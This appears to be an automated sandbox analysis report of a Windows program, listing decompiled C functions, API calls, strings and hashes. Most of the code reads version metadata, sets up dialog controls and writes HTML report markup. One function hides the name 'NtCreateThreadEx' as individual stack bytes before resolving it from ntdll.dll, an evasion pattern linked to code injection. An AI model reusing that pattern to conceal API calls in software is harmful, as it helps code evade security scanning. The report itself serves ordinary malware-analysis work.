					GetFileVersionInfoW(_a4, 0, _v8, _t84);
					if(VerQueryValueW(_t84, "\\",  &_v12,  &_v8) != 0) {
						_t81 = _v12;
						_t11 = _t81 + 0x30; // 0x4d46e853
						 *((intOrPtr*)(__edi + 4)) =  *_t11;
						_t13 = _t81 + 8; // 0x8d50ffff
						 *__edi =  *_t13;
						_t14 = _t81 + 0x14; // 0x5900004d
						 *((intOrPtr*)(__edi + 0xc)) =  *_t14;
						_t16 = _t81 + 0x10; // 0x65e850ff
						 *((intOrPtr*)(__edi + 8)) =  *_t16;
						_t18 = _t81 + 0x24; // 0xf4680000
						 *((intOrPtr*)(__edi + 0x10)) =  *_t18;
						_t20 = _t81 + 0x28; // 0xbb0040cd
						 *((intOrPtr*)(__edi + 0x14)) =  *_t20;
					}
					if(VerQueryValueW(_t84, L"\\VarFileInfo\\Translation",  &_v16,  &_v8) == 0) {
						L5:
						wcscpy( &_v60, L"040904E4");
					} else {
						_t76 = _v16;
						_push(_t76[1] & 0x0000ffff);
						_push( *_t76 & 0x0000ffff);
						_push(L"%4.4X%4.4X");
						_push(0x14);
						_push( &_v60);
						L0040B1EC();
						if(E0040AFBE( &_v572, _t84,  &_v60, 0x40c4e8) == 0) {
							goto L5;
						}
					}
					E0040AFBE(_t96 + 0x18, _t84,  &_v60, L"ProductName");
					E0040AFBE(_t96 + 0x218, _t84,  &_v60, L"FileDescription");
					E0040AFBE(_t96 + 0x418, _t84,  &_v60, L"FileVersion");
					E0040AFBE(_t96 + 0x618, _t84,  &_v60, L"ProductVersion");
					E0040AFBE(_t96 + 0x818, _t84,  &_v60, L"CompanyName");
					E0040AFBE(_t96 + 0xa18, _t84,  &_v60, L"InternalName");
					E0040AFBE(_t96 + 0xc18, _t84,  &_v60, L"LegalCopyright");
					E0040AFBE(_t96 + 0xe18, _t84,  &_v60, L"OriginalFileName");
					_push(_t84);
					_t97 = 1;
					L0040B272();
				}
				return _t97;
			}

0x0040b04d
0x0040b05e
0x0040b060
0x0040b063
0x0040b06a
0x0040b06d
0x0040b076
0x0040b07b
0x0040b07e
0x0040b084
0x0040b08e
0x0040b0a8
0x0040b0aa
0x0040b0ad
0x0040b0b0
0x0040b0b3
0x0040b0b6
0x0040b0b8
0x0040b0bb
0x0040b0be
0x0040b0c1
0x0040b0c4
0x0040b0c7
0x0040b0ca
0x0040b0cd
0x0040b0cd
0x0040b0e5
0x0040b11f
0x0040b128
0x0040b0e7
0x0040b0e7
0x0040b0f1
0x0040b0f2
0x0040b0f3
0x0040b0fb
0x0040b0fd
0x0040b0fe
0x0040b11d
0x00000000
0x00000000
0x0040b11d
0x0040b13c
0x0040b151
0x0040b166
0x0040b17b
0x0040b190
0x0040b1a5
0x0040b1ba
0x0040b1cf
0x0040b1d6
0x0040b1d7
0x0040b1d8
0x0040b1de
0x0040b1e3

APIs

GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
??2@YAPAXI@Z.MSVCRT ref: 0040B07E
GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
_snwprintf.MSVCRT ref: 0040B0FE
wcscpy.MSVCRT ref: 0040B128
??3@YAXPAX@Z.MSVCRT ref: 0040B1D8

Strings

ProductName, xrefs: 0040B12F
LegalCopyright, xrefs: 0040B1AA
040904E4, xrefs: 0040B122
\VarFileInfo\Translation, xrefs: 0040B0D8
ProductVersion, xrefs: 0040B16B
CompanyName, xrefs: 0040B180
InternalName, xrefs: 0040B195
%4.4X%4.4X, xrefs: 0040B0F3
FileDescription, xrefs: 0040B141
OriginalFileName, xrefs: 0040B1BF
FileVersion, xrefs: 0040B156

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
API String ID: 1223191525-1542517562
Opcode ID: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
Instruction ID: 283451b663653e95218ba9e6ce5340ec929c4f2fba7a9b8c11281d5ea0e9195a
Opcode Fuzzy Hash: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
Instruction Fuzzy Hash: E34144B2940219BAC704EBA5DD41DDEB7BDEF08704F100177B905B3181DB78AA59CBD8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A1EF, Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 47
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E0040A1EF(struct HINSTANCE__** __esi) {
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				struct HINSTANCE__* _t27;

				if( *__esi != 0) {
					L3:
					return 1;
				}
				_t27 = LoadLibraryW(L"ntdll.dll");
				 *__esi = _t27;
				if(_t27 != 0) {
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosw");
					asm("stosb");
					_v24 = 0x4e;
					_v23 = 0x74;
					_v13 = 0x65;
					_v12 = 0x61;
					_v18 = 0x74;
					_v17 = 0x65;
					_v22 = 0x43;
					_v14 = 0x72;
					_v11 = 0x64;
					_v21 = 0x72;
					_v10 = 0x45;
					_v9 = 0x78;
					_v20 = 0x65;
					_v19 = 0x61;
					_v16 = 0x54;
					_v15 = 0x68;
					_v8 = 0;
					__esi[1] = GetProcAddress(_t27,  &_v24);
					goto L3;
				}
				return 0;
			}

0x0040a1f8
0x0040a26d
0x00000000
0x0040a26f
0x0040a205
0x0040a20b
0x0040a20d
0x0040a213
0x0040a214
0x0040a215
0x0040a216
0x0040a217
0x0040a219
0x0040a21f
0x0040a223
0x0040a227
0x0040a22b
0x0040a22f
0x0040a233
0x0040a237
0x0040a23b
0x0040a23f
0x0040a243
0x0040a247
0x0040a24b
0x0040a24f
0x0040a253
0x0040a257
0x0040a25b
0x0040a25f
0x0040a269
0x00000000
0x0040a26c
0x0040a271

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
GetProcAddress.KERNEL32(00000000,?), ref: 0040A263

Strings

e, xrefs: 0040A24F
d, xrefs: 0040A23F
C, xrefs: 0040A237
t, xrefs: 0040A22F
ntdll.dll, xrefs: 0040A1FA
a, xrefs: 0040A253
a, xrefs: 0040A22B
r, xrefs: 0040A23B
E, xrefs: 0040A247
e, xrefs: 0040A227
t, xrefs: 0040A223
T, xrefs: 0040A257
h, xrefs: 0040A25B
x, xrefs: 0040A24B
N, xrefs: 0040A21F
r, xrefs: 0040A243
e, xrefs: 0040A233

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: C$E$N$T$a$a$d$e$e$e$h$ntdll.dll$r$r$t$t$x
API String ID: 2574300362-1257427173
Opcode ID: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
Instruction ID: 28a3addb3bc40b583479f690f9d6e65064931713b616a12c977b5f47a4008353
Opcode Fuzzy Hash: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
Instruction Fuzzy Hash: 08110A2090C6C9EDEB12C7FCC40879EBEF15B26709F0881ECC585B6292C6BA5758C776

Uniqueness

Uniqueness Score: -1.00%

Function 00407F8D, Relevance: 33.1, APIs: 22, Instructions: 137
windowCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00407F8D(void* __eax) {
				struct _SHFILEINFOW _v692;
				void _v1214;
				short _v1216;
				void* _v1244;
				void* _v1248;
				void* _v1252;
				void* _v1256;
				void* _v1268;
				void* _t37;
				long _t38;
				long _t46;
				long _t48;
				long _t58;
				void* _t62;
				intOrPtr* _t64;

				_t64 = ImageList_Create;
				_t62 = __eax;
				if( *((intOrPtr*)(__eax + 0x2b4)) != 0) {
					if( *((intOrPtr*)(__eax + 0x2bc)) == 0) {
						_t48 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
						 *(_t62 + 0x2a8) = _t48;
						__imp__ImageList_SetImageCount(_t48, 0);
						_push( *(_t62 + 0x2a8));
					} else {
						_v692.hIcon = 0;
						memset( &(_v692.iIcon), 0, 0x2b0);
						_v1216 = 0;
						memset( &_v1214, 0, 0x208);
						GetWindowsDirectoryW( &_v1216, 0x104);
						_t58 = SHGetFileInfoW( &_v1216, 0,  &_v692, 0x2b4, 0x4001);
						 *(_t62 + 0x2a8) = _t58;
						_push(_t58);
					}
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 1, ??);
				}
				if( *((intOrPtr*)(_t62 + 0x2b8)) != 0) {
					_t46 =  *_t64(0x20, 0x20, 0x19, 1, 1);
					 *(_t62 + 0x2ac) = _t46;
					__imp__ImageList_SetImageCount(_t46, 0);
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 0,  *(_t62 + 0x2ac));
				}
				 *(_t62 + 0x2a4) =  *_t64(0x10, 0x10, 0x19, 1, 1);
				_v1248 = LoadImageW(GetModuleHandleW(0), 0x85, 0, 0x10, 0x10, 0x1000);
				_t37 = LoadImageW(GetModuleHandleW(0), 0x86, 0, 0x10, 0x10, 0x1000);
				_v1244 = _t37;
				__imp__ImageList_SetImageCount( *(_t62 + 0x2a4), 0);
				_t38 = GetSysColor(0xf);
				_v1248 = _t38;
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1256, _t38);
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1252, _v1248);
				DeleteObject(_v1268);
				DeleteObject(_v1268);
				return SendMessageW(E0040331D( *(_t62 + 0x2a0)), 0x1208, 0,  *(_t62 + 0x2a4));
			}

0x00407f9b
0x00407fa3
0x00407fad
0x00407fb9
0x0040802e
0x00408032
0x00408038
0x0040803e
0x00407fbb
0x00407fc9
0x00407fd0
0x00407fe0
0x00407fe5
0x00407ff7
0x00408015
0x0040801b
0x00408021
0x00408021
0x00408051
0x00408051
0x00408059
0x00408065
0x00408069
0x0040806f
0x00408087
0x00408087
0x0040809c
0x004080bb
0x004080d1
0x004080de
0x004080e2
0x004080ea
0x004080fb
0x00408105
0x00408115
0x00408121
0x00408127
0x00408150

APIs

memset.MSVCRT ref: 00407FD0
memset.MSVCRT ref: 00407FE5
GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00407FF7
SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00408015
ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040802E
ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 00408038
SendMessageW.USER32(?,00001003,00000001,?), ref: 00408051
ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00408065
ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 0040806F
SendMessageW.USER32(?,00001003,00000000,?), ref: 00408087
ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00408093
GetModuleHandleW.KERNEL32(00000000), ref: 004080A2
LoadImageW.USER32 ref: 004080B4
GetModuleHandleW.KERNEL32(00000000), ref: 004080BF
LoadImageW.USER32 ref: 004080D1
ImageList_SetImageCount.COMCTL32(?,00000000), ref: 004080E2
GetSysColor.USER32(0000000F), ref: 004080EA
ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 00408105
ImageList_AddMasked.COMCTL32(?,?,?), ref: 00408115
DeleteObject.GDI32(?), ref: 00408121
DeleteObject.GDI32(?), ref: 00408127
SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00408144

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
String ID:
API String ID: 304928396-0
Opcode ID: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
Instruction ID: fc02d650de5297a4f4a3b2912da131a5170d4a501b91b7a2a94f7b4638737e48
Opcode Fuzzy Hash: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
Instruction Fuzzy Hash: 8F418971640304FFE6306B61DD8AF977BACFF89B00F00092DB795A51D1DAB55450DB29

Uniqueness

Uniqueness Score: -1.00%

Function 0040AE90, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E0040AE90(void* __esi, wchar_t* _a4, wchar_t* _a8) {
				int _v8;
				void _v518;
				long _v520;
				void _v1030;
				char _v1032;
				intOrPtr _t32;
				wchar_t* _t57;
				void* _t58;
				void* _t59;
				void* _t60;

				_t58 = __esi;
				_v520 = 0;
				memset( &_v518, 0, 0x1fc);
				_v1032 = 0;
				memset( &_v1030, 0, 0x1fc);
				_t60 = _t59 + 0x18;
				_v8 = 1;
				if( *((intOrPtr*)(__esi + 4)) == 0xffffffff &&  *((intOrPtr*)(__esi + 8)) <= 0) {
					_v8 = 0;
				}
				_t57 = _a4;
				 *_t57 = 0;
				if(_v8 != 0) {
					wcscpy(_t57, L"<font");
					_t32 =  *((intOrPtr*)(_t58 + 8));
					if(_t32 > 0) {
						_push(_t32);
						_push(L" size=\"%d\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
						_t60 = _t60 + 0x18;
					}
					_t33 =  *((intOrPtr*)(_t58 + 4));
					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
						_push(E0040ADC0(_t33,  &_v1032));
						_push(L" color=\"#%s\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
					}
					wcscat(_t57, ">");
				}
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"<b>");
				}
				wcscat(_t57, _a8);
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"</b>");
				}
				if(_v8 != 0) {
					wcscat(_t57, L"</font>");
				}
				return _t57;
			}

0x0040ae90
0x0040aeab
0x0040aeb2
0x0040aec0
0x0040aec7
0x0040aecc
0x0040aed3
0x0040aeda
0x0040aee1
0x0040aee1
0x0040aee7
0x0040aeea
0x0040aeed
0x0040aef9
0x0040aefe
0x0040af05
0x0040af07
0x0040af08
0x0040af13
0x0040af18
0x0040af19
0x0040af26
0x0040af2b
0x0040af2b
0x0040af2e
0x0040af34
0x0040af43
0x0040af44
0x0040af4f
0x0040af54
0x0040af55
0x0040af62
0x0040af67
0x0040af70
0x0040af76
0x0040af7a
0x0040af82
0x0040af88
0x0040af8d
0x0040af97
0x0040af9f
0x0040afa5
0x0040afa9
0x0040afb1
0x0040afb7
0x0040afbd

APIs

memset.MSVCRT ref: 0040AEB2
memset.MSVCRT ref: 0040AEC7
wcscpy.MSVCRT ref: 0040AEF9
_snwprintf.MSVCRT ref: 0040AF19
wcscat.MSVCRT ref: 0040AF26
_snwprintf.MSVCRT ref: 0040AF55
wcscat.MSVCRT ref: 0040AF62
wcscat.MSVCRT ref: 0040AF70
wcscat.MSVCRT ref: 0040AF82
wcscat.MSVCRT ref: 0040AF8D
wcscat.MSVCRT ref: 0040AF9F
wcscat.MSVCRT ref: 0040AFB1

Strings

<font, xrefs: 0040AEF3
</b>, xrefs: 0040AF99
size="%d", xrefs: 0040AF08
<b>, xrefs: 0040AF7C
</font>, xrefs: 0040AFAB
color="#%s", xrefs: 0040AF44

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscat$_snwprintfmemset$wcscpy
String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
API String ID: 3143752011-1996832678
Opcode ID: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
Instruction ID: 2e7f7f44a8c08f278b605cd2082ab28bfbf3198b566a778c3f72e8233e5ba29a
Opcode Fuzzy Hash: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
Instruction Fuzzy Hash: 2531C6B2904306A9D720EAA59D86E7E73BCDF40714F10807FF214B61C2DB7C9944D69D

Uniqueness

Uniqueness Score: -1.00%

Function 00403C03, Relevance: 30.2, APIs: 20, Instructions: 235
windowCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00403C03(void* __eflags) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* _t88;
				void* _t108;
				void* _t113;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t123;
				intOrPtr* _t124;
				void* _t134;

				_t113 = _t108;
				E00403B3C(_t113);
				E00403B16(_t113);
				DragAcceptFiles( *(_t113 + 0x10), 1);
				 *0x40f2f0 = SetWindowLongW(GetDlgItem( *(_t113 + 0x10), 0x3fd), 0xfffffffc, E00403A73);
				E00402DDD( *(_t113 + 0x10), _t113 + 0x40);
				 *(_t124 + 0x14) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x10, 0x10, 0);
				 *((intOrPtr*)(_t124 + 0x24)) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x20, 0x20, 0);
				SendMessageW( *(_t113 + 0x10), 0x80, 0,  *(_t124 + 0x10));
				SendMessageW( *(_t113 + 0x10), 0x80, 1,  *(_t124 + 0x14));
				E0040AD85(GetDlgItem( *(_t113 + 0x10), 0x402));
				 *_t124 = 0x3ea;
				E0040AD85(GetDlgItem(??, ??));
				 *_t124 = 0x3f1;
				_t116 = GetDlgItem( *(_t113 + 0x10),  *(_t113 + 0x10));
				E004049D9(_t49, E00405B81(0x259), 0x20);
				E004049D9(_t49, E00405B81(0x25a), 0x40);
				E004049D9(_t116, E00405B81(0x25b), 0x80);
				E004049D9(_t116, E00405B81(0x25c), 0x100);
				E004049D9(_t116, E00405B81(0x25d), 0x4000);
				E004049D9(_t116, E00405B81(0x25e), 0x8000);
				_t117 = GetDlgItem( *(_t113 + 0x10), 0x3f5);
				E004049D9(_t62, E00405B81(0x26c), 0);
				E004049D9(_t62, E00405B81(0x26d), 1);
				E004049D9(_t117, E00405B81(0x26e), 2);
				E004049D9(_t117, E00405B81(0x26f), 3);
				_t134 = _t124 + 0x78;
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x400);
				_t119 = 1;
				do {
					_t17 = _t119 + 0x280; // 0x281
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t17), _t119);
					_t134 = _t134 + 0xc;
					_t119 = _t119 + 1;
				} while (_t119 <= 9);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x3fc);
				_t121 = 1;
				do {
					_t21 = _t121 + 0x294; // 0x295
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t21), _t121);
					_t134 = _t134 + 0xc;
					_t121 = _t121 + 1;
				} while (_t121 <= 3);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x407);
				_t122 = 0;
				do {
					_t25 = _t122 + 0x2bc; // 0x2bc
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t25), _t122);
					_t134 = _t134 + 0xc;
					_t122 = _t122 + 1;
				} while (_t122 <= 0xd);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x40c);
				_t123 = 0;
				do {
					_t29 = _t123 + 0x2ee; // 0x2ee
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t29), _t123);
					_t134 = _t134 + 0xc;
					_t123 = _t123 + 1;
					_t143 = _t123 - 3;
				} while (_t123 < 3);
				SendDlgItemMessageW( *(_t113 + 0x10), 0x3fd, 0xc5, 0, 0);
				E00403EC3(GetDlgItem, _t113);
				SetFocus(GetDlgItem( *(_t113 + 0x10), 0x402));
				_t88 = E00402D78(_t113, _t143);
				E00402BEE(_t113);
				return _t88;
			}

0x00403c09
0x00403c0c
0x00403c11
0x00403c1b
0x00403c3f
0x00403c4a
0x00403c6e
0x00403c96
0x00403c9a
0x00403ca6
0x00403cb3
0x00403cb8
0x00403cc5
0x00403cca
0x00403cdd
0x00403ce6
0x00403cf8
0x00403d11
0x00403d26
0x00403d3f
0x00403d54
0x00403d6d
0x00403d76
0x00403d88
0x00403d9e
0x00403db0
0x00403db5
0x00403dc4
0x00403dc8
0x00403dc9
0x00403dca
0x00403dda
0x00403ddf
0x00403de2
0x00403de3
0x00403df4
0x00403df8
0x00403df9
0x00403dfa
0x00403e0a
0x00403e0f
0x00403e12
0x00403e13
0x00403e22
0x00403e26
0x00403e28
0x00403e29
0x00403e39
0x00403e3e
0x00403e41
0x00403e42
0x00403e51
0x00403e55
0x00403e57
0x00403e58
0x00403e68
0x00403e6d
0x00403e70
0x00403e71
0x00403e71
0x00403e87
0x00403e8d
0x00403e9e
0x00403ea6
0x00403eaf
0x00403ebc

APIs

Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B5D
Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B76
Part of subcall function 00403B3C: _snwprintf.MSVCRT ref: 00403B9F

Part of subcall function 00403B16: SetDlgItemTextW.USER32 ref: 00403B34

DragAcceptFiles.SHELL32(?,00000001), ref: 00403C1B
GetDlgItem.USER32 ref: 00403C2F
SetWindowLongW.USER32 ref: 00403C39

Part of subcall function 00402DDD: GetClientRect.USER32 ref: 00402DEF
Part of subcall function 00402DDD: GetWindow.USER32(?,00000005), ref: 00402E07
Part of subcall function 00402DDD: GetWindow.USER32(00000000), ref: 00402E0A
Part of subcall function 00402DDD: GetWindow.USER32(00000000,00000002), ref: 00402E16

GetModuleHandleW.KERNEL32(00000000), ref: 00403C57
LoadImageW.USER32 ref: 00403C6A
GetModuleHandleW.KERNEL32(00000000), ref: 00403C72
LoadImageW.USER32 ref: 00403C7F
SendMessageW.USER32(?,00000080,00000000,?), ref: 00403C9A
SendMessageW.USER32(?,00000080,00000001,?), ref: 00403CA6
GetDlgItem.USER32 ref: 00403CB0

Part of subcall function 0040AD85: GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
Part of subcall function 0040AD85: FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5

GetDlgItem.USER32 ref: 00403CC2
GetDlgItem.USER32 ref: 00403CD4

Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99

Part of subcall function 004049D9: SendMessageW.USER32(?,00000143,00000000,?), ref: 004049F0
Part of subcall function 004049D9: SendMessageW.USER32(?,00000151,00000000,?), ref: 00404A02

Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E

GetDlgItem.USER32 ref: 00403D64
GetDlgItem.USER32 ref: 00403DC0
GetDlgItem.USER32 ref: 00403DF0
GetDlgItem.USER32 ref: 00403E20
GetDlgItem.USER32 ref: 00403E4F
SendDlgItemMessageW.USER32 ref: 00403E87
GetDlgItem.USER32 ref: 00403E9B
SetFocus.USER32(00000000), ref: 00403E9E

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Item$MessageSend$HandleModuleWindow$Load$Imagememset$AcceptAddressClientDragFilesFocusFreeLibraryLongProcRectStringText_snwprintfmemcpywcscpywcslen
String ID:
API String ID: 1038210931-0
Opcode ID: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
Instruction ID: 1ad7597cb923a57af30b7376ae6fce15a7391ca9e5b6ac25faa2013acf12c195
Opcode Fuzzy Hash: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
Instruction Fuzzy Hash: D261A6B09407087FE6207F71DC47F2B7A6CEF40714F000A3ABB46751D3DABA69158A59

Uniqueness

Uniqueness Score: -1.00%

Function 00407763, Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E00407763(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void _v138;
				long _v140;
				void _v242;
				char _v244;
				void _v346;
				char _v348;
				void _v452;
				void _v962;
				signed short _v964;
				void* __esi;
				void* _t87;
				wchar_t* _t109;
				intOrPtr* _t124;
				signed int _t125;
				signed int _t140;
				signed int _t153;
				intOrPtr* _t154;
				signed int _t156;
				signed int _t157;
				void* _t159;
				void* _t161;

				_t124 = __ebx;
				_v964 = _v964 & 0x00000000;
				memset( &_v962, 0, 0x1fc);
				_t125 = 0x18;
				memcpy( &_v452, L"<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t125 << 2);
				asm("movsw");
				_t153 = 0;
				_v244 = 0;
				memset( &_v242, 0, 0x62);
				_v348 = 0;
				memset( &_v346, 0, 0x62);
				_v140 = 0;
				memset( &_v138, 0, 0x62);
				_t161 = _t159 + 0x3c;
				_t87 =  *((intOrPtr*)( *__ebx + 0x14))();
				_v16 =  *((intOrPtr*)(__ebx + 0x2d4));
				if(_t87 != 0xffffffff) {
					_push(E0040ADC0(_t87,  &_v964));
					_push(L" bgcolor=\"%s\"");
					_push(0x32);
					_push( &_v244);
					L0040B1EC();
					_t161 = _t161 + 0x18;
				}
				E00407343(_t124, _a4, L"<table border=\"1\" cellpadding=\"5\">\r\n");
				_v8 = _t153;
				if( *((intOrPtr*)(_t124 + 0x2c)) > _t153) {
					while(1) {
						_t156 =  *( *((intOrPtr*)(_t124 + 0x30)) + _v8 * 4);
						_v12 = _t156;
						_t157 = _t156 * 0x14;
						if( *((intOrPtr*)(_t157 +  *((intOrPtr*)(_t124 + 0x40)) + 8)) != _t153) {
							wcscpy( &_v140, L" nowrap");
						}
						_v32 = _v32 | 0xffffffff;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _t153;
						_t154 = _a8;
						 *((intOrPtr*)( *_t124 + 0x34))(6, _v8, _t154,  &_v32);
						E0040ADC0(_v32,  &_v348);
						E0040ADF1( *((intOrPtr*)( *_t154))(_v12,  *((intOrPtr*)(_t124 + 0x60))),  *(_t124 + 0x64));
						 *((intOrPtr*)( *_t124 + 0x50))( *(_t124 + 0x64), _t154, _v12);
						if( *((intOrPtr*)( *_t124 + 0x18))() == 0xffffffff) {
							wcscpy( *(_t124 + 0x68),  *(_t157 + _v16 + 0x10));
						} else {
							_push( *(_t157 + _v16 + 0x10));
							_push(E0040ADC0(_t106,  &_v964));
							_push(L"<font color=\"%s\">%s</font>");
							_push(0x2000);
							_push( *(_t124 + 0x68));
							L0040B1EC();
							_t161 = _t161 + 0x14;
						}
						_t109 =  *(_t124 + 0x64);
						_t140 =  *_t109 & 0x0000ffff;
						if(_t140 == 0 || _t140 == 0x20) {
							wcscat(_t109, L"&nbsp;");
						}
						E0040AE90( &_v32,  *((intOrPtr*)(_t124 + 0x6c)),  *(_t124 + 0x64));
						_push( *((intOrPtr*)(_t124 + 0x6c)));
